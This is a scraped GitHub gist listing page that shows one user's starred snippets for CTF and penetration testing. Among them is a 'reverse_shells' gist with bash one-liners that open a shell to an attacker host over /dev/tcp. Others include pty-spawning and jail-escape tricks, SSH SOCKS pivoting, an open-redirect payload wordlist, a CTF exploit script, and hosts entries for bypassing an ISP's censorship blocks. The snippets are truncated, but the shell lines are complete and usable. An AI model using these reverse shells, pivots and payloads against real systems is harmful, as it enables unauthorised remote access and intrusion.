Skip to content

Instantly share code, notes, and snippets.

View abdilahrf's full-sized avatar

Abdillah Hasny abdilahrf

203 followers · 68 following
View GitHub Profile
@waywardsun
waywardsun / reverse_shells
Created September 20, 2016 22:46 — forked from sckalath/reverse_shells
Reverse shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
@waywardsun
waywardsun / tricks
Created September 20, 2016 22:46 — forked from sckalath/tricks
tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
@grittyninja
grittyninja / fmtstr_patch.py
Created October 30, 2016 12:16
'''
Author : Cyber Security IPB
Date : October 28, 2016
Dependencies : pwntools
Script ini bisa mengganti pemanggilan fungsi dari suatu binary ELF
(32 / 64 bit). Misalnya mengubah dari "call printf" menjadi call "puts"
untuk menambal celah format string exploit. Atau mengubah pemanggilan
fungsi yang ada di program menjadi fungsi lain.
@rkmylo
rkmylo / rfile_solution.py
Created May 22, 2017 00:36
RCTF 2017 - rFile Solution
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
td = dt - epoch
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6
@0xBADCA7
0xBADCA7 / async_requests.py
Created August 27, 2016 06:23
Async HTTP requests in Python
from concurrent.futures import ThreadPoolExecutor
from requests_futures.sessions import FuturesSession
def outp(response):
print(response)
print(response.headers)
print(response.text)
urls = [
"https://www.google.com",
@waywardsun
waywardsun / ssh_tricks
Created September 20, 2016 22:46 — forked from sckalath/ssh_tricks
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
@ancat
ancat / notes.md
Created March 3, 2014 01:23
z3 for ctf
@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
@galpratama
galpratama / 4chan
Last active August 7, 2022 14:09
Buka Blokir Internet Positif. Caranya: https://support.rackspace.com/how-to/modify-your-hosts-file/
104.16.119.221 boards.4chan.org
104.16.59.249 i.4cdn.org
@EdOverflow
EdOverflow / open_redirect_wordlist.txt
Last active February 21, 2023 14:30
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com